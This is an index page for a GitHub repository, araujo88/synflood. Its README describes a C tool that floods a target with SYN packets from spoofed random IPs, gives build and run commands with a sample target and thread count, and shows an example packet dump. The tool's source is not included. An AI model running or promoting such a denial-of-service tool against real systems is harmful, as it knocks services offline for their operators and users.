Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/araujo88/synflood
SYN flood denial-of-service (DoS) attack coded in C using raw sockets
https://github.com/araujo88/synflood
ddos ddos-attacks dos-attack syn-flood syn-flood-attack synflood synflood-dos
Last synced: 1 day ago
JSON representation
SYN flood denial-of-service (DoS) attack coded in C using raw sockets
- Host: GitHub
- URL: https://github.com/araujo88/synflood
- Owner: araujo88
- License: gpl-3.0
- Created: 2022-02-19T06:00:29.000Z (almost 3 years ago)
- Default Branch: main
- Last Pushed: 2022-02-19T23:49:01.000Z (almost 3 years ago)
- Last Synced: 2023-03-08T04:35:39.722Z (almost 2 years ago)
- Topics: ddos, ddos-attacks, dos-attack, syn-flood, syn-flood-attack, synflood, synflood-dos
- Language: C
- Homepage:
- Size: 43.9 KB
- Stars: 0
- Watchers: 1
- Forks: 2
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# synflood
SYN flood denial-of-service (DoS) attack coded in C using raw sockets. Generates random spoofed IPs at each new packet.## Build
`make clean`
`make`## Usage
`sudo ./synflood `
## Example
`sudo ./synflood 1.2.3.4 OWNED 10 80`
Will create 10 threads which will send the following TCP/IP packet in loop:
```
***********************TCP Packet*************************Ethernet Header
|-Destination Address : XX-XX-XX-XX-XX-XX
|-Source Address : XX-XX-XX-XX-XX-XX
|-Protocol : 8IP Header
|-IP Version : 4
|-IP Header Length : 5 DWORDS or 20 Bytes
|-Type Of Service : 0
|-IP Total Length : 54 Bytes(Size of Packet)
|-Identification : 6082
|-TTL : 255
|-Protocol : 6
|-Checksum : 55149
|-Source IP : xxx.xxx.xxx.xxx
|-Destination IP : 1.2.3.4TCP Header
|-Source Port : 28659
|-Destination Port : 80
|-Sequence Number : 0
|-Acknowledge Number : 0
|-Header Length : 5 DWORDS or 20 BYTES
|-Urgent Flag : 0
|-Acknowledgement Flag : 0
|-Push Flag : 0
|-Reset Flag : 0
|-Synchronise Flag : 1
|-Finish Flag : 0
|-Window : 5840
|-Checksum : 41290
|-Urgent Pointer : 0DATA Dump
Data Payload
4F 57 4E 45 44 00 00 00 00 00 00 00 00 00 OWNED.........
```